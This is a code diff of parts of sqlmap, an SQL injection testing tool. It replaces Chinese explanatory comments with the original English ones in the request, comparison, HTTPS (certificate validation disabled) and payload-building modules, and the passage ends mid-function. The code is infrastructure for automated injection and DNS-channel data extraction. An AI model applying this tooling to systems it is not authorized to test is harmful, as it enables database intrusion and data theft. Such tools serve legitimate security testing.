-    这是一个处理HTTP基础认证的智能处理器类,继承自HTTPBasicAuthHandler
-    主要用于处理认证重试的逻辑,避免无限循环重试的问题
+    Reference: http://selenic.com/hg/rev/6c51a5056020
+    Fix for a: http://bugs.python.org/issue8797
    """

    def __init__(self, *args, **kwargs):
-        # 调用父类的初始化方法
        _urllib.request.HTTPBasicAuthHandler.__init__(self, *args, **kwargs)
-        # 创建一个集合用于存储已重试过的请求
        self.retried_req = set()
-        # 重试计数器初始化为0
        self.retried_count = 0

    def reset_retry_count(self):
-        """
-        重置重试计数的方法
-        Python 2.6.5在遇到401或407错误时会调用此方法,可能导致无限循环
-        因此这里禁用了重置功能,改为在http_error_auth_reqed中进行重置
-        """
+        # Python 2.6.5 will call this on 401 or 407 errors and thus loop
+        # forever. We disable reset_retry_count completely and reset in
+        # http_error_auth_reqed instead.
        pass

    def http_error_auth_reqed(self, auth_header, host, req, headers):
-        """
-        处理需要认证的HTTP错误
-        
-        参数说明:
-        auth_header: 认证头信息
-        host: 目标主机
-        req: 请求对象
-        headers: 请求头
-        
-        处理逻辑:
-        1. 对每个新请求重置重试计数器
-        2. 限制最大重试次数为5次
-        3. 超过重试次数则抛出HTTP 401错误
-        """
-        # 如果是新的请求(通过hash判断)
+        # Reset the retry counter once for each request.
        if hash(req) not in self.retried_req:
-            # 将请求添加到已重试集合中
            self.retried_req.add(hash(req))
-            # 重置重试计数
            self.retried_count = 0
        else:
-            # 如果重试次数超过5次
            if self.retried_count > 5:
-                # 抛出HTTP 401认证失败错误
                raise _urllib.error.HTTPError(req.get_full_url(), 401, "basic auth failed", headers, None)
            else:
-                # 增加重试计数
                self.retried_count += 1

-        # 调用父类的错误处理方法
        return _urllib.request.HTTPBasicAuthHandler.http_error_auth_reqed(self, auth_header, host, req, headers)
--- a/src/sqlmap-master/lib/request/chunkedhandler.py
+++ b/src/sqlmap-master/lib/request/chunkedhandler.py
@ -5,63 +5,37 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入必要的模块
-from lib.core.data import conf  # 导入配置信息
-from lib.core.enums import HTTP_HEADER  # 导入HTTP头部常量定义
-from thirdparty.six.moves import urllib as _urllib  # 导入urllib模块并重命名为_urllib,用于处理URL和HTTP请求
+from lib.core.data import conf
+from lib.core.enums import HTTP_HEADER
+from thirdparty.six.moves import urllib as _urllib

 class ChunkedHandler(_urllib.request.HTTPHandler):
    """
-    用于确保在使用分块传输编码(Chunked Transfer-Encoding)时HTTPHandler能正常工作的处理器类
-    继承自urllib的HTTPHandler类,主要用于处理HTTP请求的发送
-    分块传输编码允许HTTP消息在不预先知道消息总长度的情况下进行传输
+    Ensures that HTTPHandler is working properly in case of Chunked Transfer-Encoding
    """

    def _http_request(self, request):
-        """
-        处理HTTP请求的核心方法
-        参数:
-            request: HTTP请求对象,包含请求的所有信息(如URL、头部、数据等)
-        返回:
-            处理后的request对象
-        """
-        # 获取请求的主机名,优先使用get_host()方法(新版本),如果不存在则使用host属性(旧版本)
        host = request.get_host() if hasattr(request, "get_host") else request.host
        if not host:
-            # 如果没有指定主机名则抛出异常,因为HTTP请求必须知道发送到哪个主机
            raise _urllib.error.URLError("no host given")

-        if request.data is not None:  # 如果是POST请求(包含数据)
+        if request.data is not None:  # POST
            data = request.data
-            # 如果没有设置Content-Type头,则设置为默认的表单格式
-            # application/x-www-form-urlencoded 是最常见的POST数据格式
            if not request.has_header(HTTP_HEADER.CONTENT_TYPE):
                request.add_unredirected_header(HTTP_HEADER.CONTENT_TYPE, "application/x-www-form-urlencoded")
-            # 如果没有设置Content-Length头且不使用分块传输,则设置内容长度
-            # Content-Length告诉服务器请求体的具体长度
            if not request.has_header(HTTP_HEADER.CONTENT_LENGTH) and not conf.chunked:
                request.add_unredirected_header(HTTP_HEADER.CONTENT_LENGTH, "%d" % len(data))

-        # 设置用于选择的主机名
        sel_host = host
-        # 如果使用了代理,则从请求选择器中解析出实际的主机名
-        # 代理请求时,请求行中包含完整的URL,需要从中提取出真实的主机名
        if request.has_proxy():
            sel_host = _urllib.parse.urlsplit(request.get_selector()).netloc

-        # 如果没有设置Host头,则添加Host头
-        # Host头是HTTP/1.1必需的头部,用于指定服务器的域名和端口号
        if not request.has_header(HTTP_HEADER.HOST):
            request.add_unredirected_header(HTTP_HEADER.HOST, sel_host)
-        # 遍历父类中定义的额外头部信息
        for name, value in self.parent.addheaders:
-            name = name.capitalize()  # 将头部名称首字母大写,符合HTTP协议规范
-            # 如果请求中没有该头部,则添加到请求中
-            # 这确保了自定义头部不会覆盖已有的头部
+            name = name.capitalize()
            if not request.has_header(name):
                request.add_unredirected_header(name, value)
        return request

-    # 将_http_request方法赋值给http_request,使其成为标准的处理方法
-    # 这是一种Python的惯用法,允许在保留原始方法的同时提供一个公开的接口
    http_request = _http_request
--- a/src/sqlmap-master/lib/request/comparison.py
+++ b/src/sqlmap-master/lib/request/comparison.py
@ -5,12 +5,10 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入未来版本的除法运算
 from __future__ import division

 import re

-# 导入所需的工具函数
 from lib.core.common import extractRegexResult
 from lib.core.common import getFilteredPageContent
 from lib.core.common import listToStrValue
@ -37,28 +35,15 @@ from lib.core.threads import getCurrentThreadData
 from thirdparty import six

 def comparison(page, headers, code=None, getRatioValue=False, pageLength=None):
-    """
-    页面比较的主入口函数
-    :param page: 要比较的页面内容
-    :param headers: HTTP响应头
-    :param code: HTTP状态码
-    :param getRatioValue: 是否返回相似度值
-    :param pageLength: 页面长度
-    :return: 比较结果
-    """
    _ = _adjust(_comparison(page, headers, code, getRatioValue, pageLength), getRatioValue)
    return _

 def _adjust(condition, getRatioValue):
-    """
-    调整比较结果
-    :param condition: 原始比较结果
-    :param getRatioValue: 是否返回相似度值
-    :return: 调整后的结果
-    """
    if not any((conf.string, conf.notString, conf.regexp, conf.code)):
-        # 在原始页面比较方案中使用负逻辑方法
-        # 与原始PAYLOAD.WHERE.NEGATIVE响应"不同"的内容被认为是True
+        # Negative logic approach is used in raw page comparison scheme as that what is "different" than original
+        # PAYLOAD.WHERE.NEGATIVE response is considered as True; in switch based approach negative logic is not
+        # applied as that what is by user considered as True is that what is returned by the comparison mechanism
+        # itself
        retVal = not condition if kb.negativeLogic and condition is not None and not getRatioValue else condition
    else:
        retVal = condition if not getRatioValue else (MAX_RATIO if condition else MIN_RATIO)
@ -66,37 +51,24 @@ def _adjust(condition, getRatioValue):
    return retVal

 def _comparison(page, headers, code, getRatioValue, pageLength):
-    """
-    核心比较函数
-    :param page: 要比较的页面内容
-    :param headers: HTTP响应头
-    :param code: HTTP状态码
-    :param getRatioValue: 是否返回相似度值
-    :param pageLength: 页面长度
-    :return: 比较结果
-    """
-    # 获取当前线程数据
    threadData = getCurrentThreadData()

-    # 测试模式下保存比较数据
    if kb.testMode:
        threadData.lastComparisonHeaders = listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else ""
        threadData.lastComparisonPage = page
        threadData.lastComparisonCode = code

-    # 页面内容和长度都为空时返回None
    if page is None and pageLength is None:
        return None

-    # 处理字符串匹配情况
    if any((conf.string, conf.notString, conf.regexp)):
        rawResponse = "%s%s" % (listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else "", page)

-        # 检查页面是否包含指定的匹配字符串
+        # String to match in page when the query is True
        if conf.string:
            return conf.string in rawResponse

-        # 检查页面是否不包含指定的字符串
+        # String to match in page when the query is False
        if conf.notString:
            if conf.notString in rawResponse:
                return False
@ -106,25 +78,24 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
                else:
                    return True

-        # 使用正则表达式匹配页面内容
+        # Regular expression to match in page when the query is True and/or valid
        if conf.regexp:
            return re.search(conf.regexp, rawResponse, re.I | re.M) is not None

-    # 检查HTTP状态码是否匹配
+    # HTTP code to match when the query is valid
    if conf.code:
        return conf.code == code

-    # 初始化序列匹配器
    seqMatcher = threadData.seqMatcher
    seqMatcher.set_seq1(kb.pageTemplate)

    if page:
-        # 处理数据库错误页面
+        # In case of an DBMS error page return None
        if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()) and not kb.negativeLogic:
            if not (wasLastResponseHTTPError() and getLastRequestHTTPError() in (conf.ignoreCode or [])):
                return None

-        # 移除动态内容后再比较
+        # Dynamic content lines to be excluded before comparison
        if not kb.nullConnection:
            page = removeDynamicContent(page)
            seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate))
@ -132,7 +103,6 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
        if not pageLength:
            pageLength = len(page)

-    # 处理空连接情况
    if kb.nullConnection and pageLength:
        if not seqMatcher.a:
            errMsg = "problem occurred while retrieving original page content "
@ -140,19 +110,18 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
            errMsg += "and if the problem persists turn off any optimization switches"
            raise SqlmapNoneDataException(errMsg)

-        # 计算页面长度比率
        ratio = 1. * pageLength / len(seqMatcher.a)

        if ratio > 1.:
            ratio = 1. / ratio
    else:
-        # 处理编码问题，确保可以正确比较
+        # Preventing "Unicode equal comparison failed to convert both arguments to Unicode"
+        # (e.g. if one page is PDF and the other is HTML)
        if isinstance(seqMatcher.a, six.binary_type) and isinstance(page, six.text_type):
            page = getBytes(page, kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore")
        elif isinstance(seqMatcher.a, six.text_type) and isinstance(page, six.binary_type):
            seqMatcher.a = getBytes(seqMatcher.a, kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore")

-        # 处理各种比较情况
        if any(_ is None for _ in (page, seqMatcher.a)):
            return None
        elif seqMatcher.a and page and seqMatcher.a == page:
@ -167,7 +136,6 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
        else:
            seq1, seq2 = None, None

-            # 根据配置选择比较内容
            if conf.titles:
                seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a)
                seq2 = extractRegexResult(HTML_TITLE_REGEX, page)
@ -178,14 +146,13 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
            if seq1 is None or seq2 is None:
                return None

-            # 移除反射值标记
            seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "")
            seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "")

-            # 处理高度动态内容
            if kb.heavilyDynamic:
                seq1 = seq1.split("\n")
                seq2 = seq2.split("\n")
+
                key = None
            else:
                key = (hash(seq1), hash(seq2))
@ -193,7 +160,6 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
            seqMatcher.set_seq1(seq1)
            seqMatcher.set_seq2(seq2)

-            # 使用缓存提高性能
            if key in kb.cache.comparison:
                ratio = kb.cache.comparison[key]
            else:
@ -202,7 +168,8 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
            if key:
                kb.cache.comparison[key] = ratio

-    # 设置匹配比率
+    # If the url is stable and we did not set yet the match ratio and the
+    # current injected value changes the url page content
    if kb.matchRatio is None:
        if ratio >= LOWER_RATIO_BOUND and ratio <= UPPER_RATIO_BOUND:
            kb.matchRatio = ratio
@ -211,14 +178,19 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
    if kb.testMode:
        threadData.lastComparisonRatio = ratio

-    # 根据不同情况返回结果
+    # If it has been requested to return the ratio and not a comparison
+    # response
    if getRatioValue:
        return ratio
+
    elif ratio > UPPER_RATIO_BOUND:
        return True
+
    elif ratio < LOWER_RATIO_BOUND:
        return False
+
    elif kb.matchRatio is None:
        return None
+
    else:
        return (ratio - kb.matchRatio) > DIFF_TOLERANCE
--- a/src/sqlmap-master/lib/request/connect.py
+++ b/src/sqlmap-master/lib/request/connect.py
@ -5,7 +5,6 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的标准库
 import binascii
 import inspect
 import logging
@ -19,7 +18,6 @@ import sys
 import time
 import traceback

-# 尝试导入websocket库,如果不存在则定义一个简单的异常类
 try:
    import websocket
    from websocket import WebSocketException
@ -27,7 +25,6 @@ except ImportError:
    class WebSocketException(Exception):
        pass

-# 导入sqlmap自定义的库和工具函数
 from lib.core.agent import agent
 from lib.core.common import asciifyUrl
 from lib.core.common import calculateDeltaSeconds
@ -149,18 +146,13 @@ from thirdparty.socks.socks import ProxyError

 class Connect(object):
    """
-    这个类定义了用于执行HTTP请求的方法
+    This class defines methods used to perform HTTP requests
    """

    @staticmethod
    def _getPageProxy(**kwargs):
-        """
-        代理方法,用于处理页面请求
-        检查递归深度并调用getPage方法
-        """
        try:
-            # 检查调用栈深度是否超过限制
-            if (len(inspect.stack()) > sys.getrecursionlimit() // 2):   
+            if (len(inspect.stack()) > sys.getrecursionlimit() // 2):   # Note: https://github.com/sqlmapproject/sqlmap/issues/4525
                warnMsg = "unable to connect to the target URL"
                raise SqlmapConnectionException(warnMsg)
        except (TypeError, UnicodeError):
@ -173,15 +165,9 @@ class Connect(object):

    @staticmethod
    def _retryProxy(**kwargs):
-        """
-        重试代理方法
-        处理请求失败时的重试逻辑
-        """
-        # 获取当前线程数据
        threadData = getCurrentThreadData()
        threadData.retriesCount += 1

-        # 如果配置了代理列表且重试次数达到上限,则更换代理
        if conf.proxyList and threadData.retriesCount >= conf.retries and not kb.locks.handlers.locked():
            warnMsg = "changing proxy"
            logger.warning(warnMsg)
@ -191,8 +177,9 @@ class Connect(object):

            setHTTPHandlers()

-        # 处理基于时间的测试模式
        if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME:
+            # timed based payloads can cause web server unresponsiveness
+            # if the injectable piece of code is some kind of JOIN-like query
            warnMsg = "most likely web server instance hasn't recovered yet "
            warnMsg += "from previous timed based payload. If the problem "
            warnMsg += "persists please wait for a few minutes and rerun "
@ -201,7 +188,6 @@ class Connect(object):
            warnMsg += "lower the value of option '--time-sec' (e.g. '--time-sec=2')"
            singleTimeWarnMessage(warnMsg)

-        # 处理原始页面为空的情况
        elif kb.originalPage is None:
            if conf.tor:
                warnMsg = "please make sure that you have "
@ -228,28 +214,20 @@ class Connect(object):

            singleTimeWarnMessage(warnMsg)

-        # 处理多线程情况
        elif conf.threads > 1:
            warnMsg = "if the problem persists please try to lower "
            warnMsg += "the number of used threads (option '--threads')"
            singleTimeWarnMessage(warnMsg)

-        # 重试请求
        kwargs['retrying'] = True
        return Connect._getPageProxy(**kwargs)

    @staticmethod
    def _connReadProxy(conn):
-        """
-        读取连接响应的代理方法
-        处理压缩和大响应的情况
-        """
        retVal = b""

-        # 如果不是DNS模式且连接存在
        if not kb.dnsMode and conn:
            headers = conn.info()
-            # 处理压缩响应
            if kb.pageCompress and headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
                retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
                if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
@ -258,7 +236,6 @@ class Connect(object):
                    kb.pageCompress = False
                    raise SqlmapCompressionException
            else:
-                # 分块读取大响应
                while True:
                    if not conn:
                        break
@ -277,13 +254,11 @@ class Connect(object):
                        retVal += part
                        break

-                    # 检查总响应大小是否超过限制
                    if len(retVal) > MAX_CONNECTION_TOTAL_SIZE:
                        warnMsg = "too large response detected. Automatically trimming it"
                        singleTimeWarnMessage(warnMsg)
                        break

-        # 处理特殊的响应放大因子
        if conf.yuge:
            retVal = YUGE_FACTOR * retVal

@ -292,14 +267,13 @@ class Connect(object):
    @staticmethod
    def getPage(**kwargs):
        """
-        这个方法连接到目标URL或代理并返回目标URL页面内容
+        This method connects to the target URL or proxy and returns
+        the target URL page content
        """

-        # 如果是离线模式直接返回
        if conf.offline:
            return None, None, None

-        # 获取请求参数
        url = kwargs.get("url", None) or conf.url
        get = kwargs.get("get", None)
        post = kwargs.get("post", None)
@ -323,19 +297,16 @@ class Connect(object):
        finalCode = kwargs.get("finalCode", False)
        chunked = kwargs.get("chunked", False) or conf.chunked

-        # 处理请求延迟
        if isinstance(conf.delay, (int, float)) and conf.delay > 0:
            time.sleep(conf.delay)

        start = time.time()

-        # 获取当前线程数据
        threadData = getCurrentThreadData()
        with kb.locks.request:
            kb.requestCounter += 1
            threadData.lastRequestUID = kb.requestCounter

-            # 处理代理频率
            if conf.proxyFreq:
                if kb.requestCounter % conf.proxyFreq == 0:
                    conf.proxy = None
@ -345,7 +316,6 @@ class Connect(object):

                    setHTTPHandlers()

-        # 处理测试模式
        if conf.dummy or conf.murphyRate and randomInt() % conf.murphyRate == 0:
            if conf.murphyRate:
                time.sleep(randomInt() % (MAX_MURPHY_SLEEP_TIME + 1))
@ -357,7 +327,6 @@ class Connect(object):

            return page, headers, code

-        # 处理cookie
        if conf.liveCookies:
            with kb.locks.liveCookies:
                if not checkFile(conf.liveCookies, raiseOnError=False) or os.path.getsize(conf.liveCookies) == 0:
@ -382,7 +351,6 @@ class Connect(object):
                cookie = openFile(conf.liveCookies).read().strip()
                cookie = re.sub(r"(?i)\ACookie:\s*", "", cookie)

-        # 处理multipart请求
        if multipart:
            post = multipart
        else:
@ -393,20 +361,20 @@ class Connect(object):
                post = _urllib.parse.unquote(post)
                post = chunkSplitPostData(post)

-        # 处理WebSocket请求
        webSocket = url.lower().startswith("ws")

        if not _urllib.parse.urlsplit(url).netloc:
            url = _urllib.parse.urljoin(conf.url, url)

-        # 检查是否是相同的目标主机
+        # flag to know if we are dealing with the same target host
        target = checkSameHost(url, conf.url)

        if not retrying:
-            # 重置连接重试次数
+            # Reset the number of connection retries
            threadData.retriesCount = 0

-        # 修复URL中的空格
+        # fix for known issue when urllib2 just skips the other part of provided
+        # url splitted with space char while urlencoding it in the later phase
        url = url.replace(" ", "%20")

        if "://" not in url:
@ -428,7 +396,8 @@ class Connect(object):

        raise404 = raise404 and not kb.ignoreNotFound

-        # 支持非拉丁字符的URL
+        # support for non-latin (e.g. cyrillic) URLs as urllib/urllib2 doesn't
+        # support those by default
        url = asciifyUrl(url)

        try:
@ -471,7 +440,7 @@ class Connect(object):

            requestMsg += " %s" % _http_client.HTTPConnection._http_vsn_str

-            # 准备HTTP头
+            # Prepare HTTP headers
            headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: getHeader(dict(conf.httpHeaders), HTTP_HEADER.HOST) or getHostHeader(url)}, base=None if target else {})

            if HTTP_HEADER.COOKIE in headers:
@ -655,11 +624,11 @@ class Connect(object):
                if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):
                    kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION)

-                # 返回响应对象
+                # Return response object
                if response:
                    return conn, None, None

-                # 获取HTTP响应
+                # Get HTTP response
                if hasattr(conn, "redurl"):
                    page = (threadData.lastRedirectMsg[1] if kb.choices.redirect == REDIRECTION.NO else Connect._connReadProxy(conn)) if not skipRead else None
                    skipLogTraffic = kb.choices.redirect == REDIRECTION.NO
--- a/src/sqlmap-master/lib/request/direct.py
+++ b/src/sqlmap-master/lib/request/direct.py
@ -5,7 +5,6 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的模块
 import re
 import time

@ -31,87 +30,58 @@ from lib.utils.safe2bin import safecharencode
 from lib.utils.timeout import timeout

 def direct(query, content=True):
-    """
-    直接执行SQL查询的主函数
-    参数:
-        query: 要执行的SQL查询语句
-        content: 是否返回查询内容,默认为True
-    """
-    # 标记是否为SELECT查询
    select = True
-    # 处理查询语句,添加必要的payload
    query = agent.payloadDirect(query)
    query = agent.adjustLateValues(query)
-    # 获取当前线程数据
    threadData = getCurrentThreadData()

-    # 针对Oracle数据库的特殊处理:如果是不带FROM的SELECT语句,添加"FROM DUAL"
    if Backend.isDbms(DBMS.ORACLE) and query.upper().startswith("SELECT ") and " FROM " not in query.upper():
        query = "%s FROM DUAL" % query

-    # 通过遍历SQL语句字典判断是否为SELECT查询
    for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
        for sqlStatement in sqlStatements:
            if query.lower().startswith(sqlStatement) and sqlTitle != "SQL SELECT statement":
                select = False
                break

-    # 如果是SELECT查询,进行相应处理
    if select:
-        # 如果查询不以SELECT开头,添加SELECT
        if re.search(r"(?i)\ASELECT ", query) is None:
            query = "SELECT %s" % query

-        # 处理二进制字段
        if conf.binaryFields:
            for field in conf.binaryFields:
                field = field.strip()
                if re.search(r"\b%s\b" % re.escape(field), query):
                    query = re.sub(r"\b%s\b" % re.escape(field), agent.hexConvertField(field), query)

-    # 记录查询语句到日志
    logger.log(CUSTOM_LOGGING.PAYLOAD, query)

-    # 尝试从缓存中获取查询结果
    output = hashDBRetrieve(query, True, True)
    start = time.time()

-    # 执行查询
    if not select and re.search(r"(?i)\bEXEC ", query) is None:
-        # 非SELECT且非EXEC语句的执行
        timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None)
    elif not (output and ("%soutput" % conf.tablePrefix) not in query and ("%sfile" % conf.tablePrefix) not in query):
-        # SELECT查询的执行
        output, state = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None)
        if state == TIMEOUT_STATE.NORMAL:
-            # 正常执行完成,将结果写入缓存
            hashDBWrite(query, output, True)
        elif state == TIMEOUT_STATE.TIMEOUT:
-            # 超时处理:关闭连接并重新连接
            conf.dbmsConnector.close()
            conf.dbmsConnector.connect()
    elif output:
-        # 如果有缓存结果,显示提示信息
        infoMsg = "resumed: %s..." % getUnicode(output, UNICODE_ENCODING)[:20]
        logger.info(infoMsg)

-    # 记录查询执行时间
    threadData.lastQueryDuration = calculateDeltaSeconds(start)

-    # 处理返回结果
    if not output:
        return output
    elif content:
-        # 如果需要返回内容
        if output and isListLike(output):
            if len(output[0]) == 1:
-                # 如果结果只有一列,简化输出格式
                output = [_[0] for _ in output]

-        # 转换为Unicode格式
        retVal = getUnicode(output, noneToNull=True)
-        # 根据配置决定是否进行安全字符编码
        return safecharencode(retVal) if kb.safeCharEncode else retVal
    else:
-        # 如果不需要返回内容,提取预期的布尔值
        return extractExpectedValue(output, EXPECTED.BOOL)
--- a/src/sqlmap-master/lib/request/dns.py
+++ b/src/sqlmap-master/lib/request/dns.py
@ -7,17 +7,16 @@ See the file 'LICENSE' for copying permission

 from __future__ import print_function

-import binascii  # 用于二进制和ASCII转换
+import binascii
 import os
 import re
-import socket   # 用于网络通信
-import struct   # 用于处理字节串
-import threading  # 用于多线程
+import socket
+import struct
+import threading
 import time

 class DNSQuery(object):
    """
-    DNS查询解析类
    >>> DNSQuery(b'|K\\x01 \\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x03www\\x06google\\x03com\\x00\\x00\\x01\\x00\\x01\\x00\\x00)\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\n\\x00\\x08O4|Np!\\x1d\\xb3')._query == b"www.google.com."
    True
    >>> DNSQuery(b'\\x00')._query == b""
@ -25,15 +24,12 @@ class DNSQuery(object):
    """

    def __init__(self, raw):
-        self._raw = raw  # 原始DNS查询数据
-        self._query = b""  # 解析后的域名查询字符串
+        self._raw = raw
+        self._query = b""

        try:
-            # 从DNS报文中提取操作码(Opcode)
-            type_ = (ord(raw[2:3]) >> 3) & 15
+            type_ = (ord(raw[2:3]) >> 3) & 15                   # Opcode bits

-            if type_ == 0:  # 标准查询
-                i = 12  # DNS报文头部长度为12字节
            if type_ == 0:                                      # Standard query
                i = 12
                j = ord(raw[i:i + 1])
--- a/src/sqlmap-master/lib/request/httpshandler.py
+++ b/src/sqlmap-master/lib/request/httpshandler.py
@ -5,7 +5,6 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的标准库和第三方库
 import re
 import socket

@ -21,7 +20,6 @@ from lib.core.settings import PYVERSION
 from thirdparty.six.moves import http_client as _http_client
 from thirdparty.six.moves import urllib as _urllib

-# 尝试导入ssl模块,如果导入失败则ssl为None
 ssl = None
 try:
    import ssl as _ssl
@ -29,38 +27,31 @@ try:
 except ImportError:
    pass

-# 获取所有可用的SSL/TLS协议版本,并存储在_protocols列表中
 _protocols = filterNone(getattr(ssl, _, None) for _ in ("PROTOCOL_TLS_CLIENT", "PROTOCOL_TLSv1_2", "PROTOCOL_TLSv1_1", "PROTOCOL_TLSv1", "PROTOCOL_SSLv3", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2"))
-# 创建协议名称和值的映射字典
 _lut = dict((getattr(ssl, _), _) for _ in dir(ssl) if _.startswith("PROTOCOL_"))
-# 存储SSL上下文的字典
 _contexts = {}

 class HTTPSConnection(_http_client.HTTPSConnection):
    """
-    自定义HTTPS连接类,支持使用较新的SSL协议。
-    继承自标准库的HTTPSConnection类。
+    Connection class that enables usage of newer SSL protocols.

-    参考: http://bugs.python.org/msg128686
+    Reference: http://bugs.python.org/msg128686

-    注意: 使用 https://check-tls.akamaized.net/ 检查TLS/SNI是否正常工作
+    NOTE: use https://check-tls.akamaized.net/ to check if (e.g.) TLS/SNI is working properly
    """

    def __init__(self, *args, **kwargs):
-        # 修复Python bug: https://bugs.python.org/issue38251
+        # NOTE: Dirty patch for https://bugs.python.org/issue38251 / https://github.com/sqlmapproject/sqlmap/issues/4158
        if hasattr(ssl, "_create_default_https_context"):
            if None not in _contexts:
                _contexts[None] = ssl._create_default_https_context()
            kwargs["context"] = _contexts[None]

-        # 重试标志
        self.retrying = False

-        # 调用父类初始化方法
        _http_client.HTTPSConnection.__init__(self, *args, **kwargs)

    def connect(self):
-        # 创建socket连接的内部函数
        def create_sock():
            sock = socket.create_connection((self.host, self.port), self.timeout)
            if getattr(self, "_tunnel_host", None):
@ -70,33 +61,31 @@ class HTTPSConnection(_http_client.HTTPSConnection):

        success = False

-        # 使用SSLContext方式建立SSL连接(Python 2.7.9及更高版本支持)
+        # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
+        #               https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
        if hasattr(ssl, "SSLContext"):
            for protocol in (_ for _ in _protocols if _ >= ssl.PROTOCOL_TLSv1):
                try:
                    sock = create_sock()
                    if protocol not in _contexts:
-                        # 创建SSL上下文
                        _contexts[protocol] = ssl.SSLContext(protocol)

-                        # 禁用证书和主机名验证
+                        # Disable certificate and hostname validation enabled by default with PROTOCOL_TLS_CLIENT
                        _contexts[protocol].check_hostname = False
                        _contexts[protocol].verify_mode = ssl.CERT_NONE

-                        # 如果提供了证书和密钥文件,则加载它们
                        if getattr(self, "cert_file", None) and getattr(self, "key_file", None):
                            _contexts[protocol].load_cert_chain(certfile=self.cert_file, keyfile=self.key_file)
                        try:
-                            # 设置加密套件
+                            # Reference(s): https://askubuntu.com/a/1263098
+                            #               https://askubuntu.com/a/1250807
                            _contexts[protocol].set_ciphers("DEFAULT@SECLEVEL=1")
                        except (ssl.SSLError, AttributeError):
                            pass
-                    # 包装socket并进行SSL握手
                    result = _contexts[protocol].wrap_socket(sock, do_handshake_on_connect=True, server_hostname=self.host if re.search(r"\A[\d.]+\Z", self.host or "") is None else None)
                    if result:
                        success = True
                        self.sock = result
-                        # 将成功的协议移到列表开头
                        _protocols.remove(protocol)
                        _protocols.insert(0, protocol)
                        break
@ -106,7 +95,6 @@ class HTTPSConnection(_http_client.HTTPSConnection):
                    self._tunnel_host = None
                    logger.debug("SSL connection error occurred for '%s' ('%s')" % (_lut[protocol], getSafeExString(ex)))

-        # 使用旧式ssl.wrap_socket方式建立SSL连接(用于较老版本的Python)
        elif hasattr(ssl, "wrap_socket"):
            for protocol in _protocols:
                try:
@ -124,14 +112,12 @@ class HTTPSConnection(_http_client.HTTPSConnection):
                    self._tunnel_host = None
                    logger.debug("SSL connection error occurred for '%s' ('%s')" % (_lut[protocol], getSafeExString(ex)))

-        # 如果所有协议都连接失败
        if not success:
            errMsg = "can't establish SSL connection"
-            # 对于Python 2.7.9之前的版本,建议升级
+            # Reference: https://docs.python.org/2/library/ssl.html
            if LooseVersion(PYVERSION) < LooseVersion("2.7.9"):
                errMsg += " (please retry with Python >= 2.7.9)"

-            # 如果之前有成功连接过且未在重试,则进行重试
            if kb.sslSuccess and not self.retrying:
                self.retrying = True

@ -148,9 +134,5 @@ class HTTPSConnection(_http_client.HTTPSConnection):
            kb.sslSuccess = True

 class HTTPSHandler(_urllib.request.HTTPSHandler):
-    """
-    HTTPS处理器类,用于处理HTTPS请求
-    """
    def https_open(self, req):
-        # 根据是否有ssl模块选择合适的连接类来处理请求
        return self.do_open(HTTPSConnection if ssl else _http_client.HTTPSConnection, req)
--- a/src/sqlmap-master/lib/request/inject.py
+++ b/src/sqlmap-master/lib/request/inject.py
@ -314,42 +314,30 @@ def _goBooleanProxy(expression):
    Retrieve the output of a boolean based SQL query
    """

-    # 初始化技术
    initTechnique(getTechnique())

-    # 如果配置了dns域名
    if conf.dnsDomain:
-        # 获取查询语句
        query = agent.prefixQuery(getTechniqueData().vector)
        query = agent.suffixQuery(query)
-        # 获取payload
        payload = agent.payload(newValue=query)
-        # 执行dns查询
        output = _goDns(payload, expression)

-        # 如果查询结果不为空，则返回
        if output is not None:
            return output

-    # 获取查询语句
    vector = getTechniqueData().vector
    vector = vector.replace(INFERENCE_MARKER, expression)
    query = agent.prefixQuery(vector)
    query = agent.suffixQuery(query)
-    # 获取payload
    payload = agent.payload(newValue=query)

-    # 判断是否是时间相关的技术
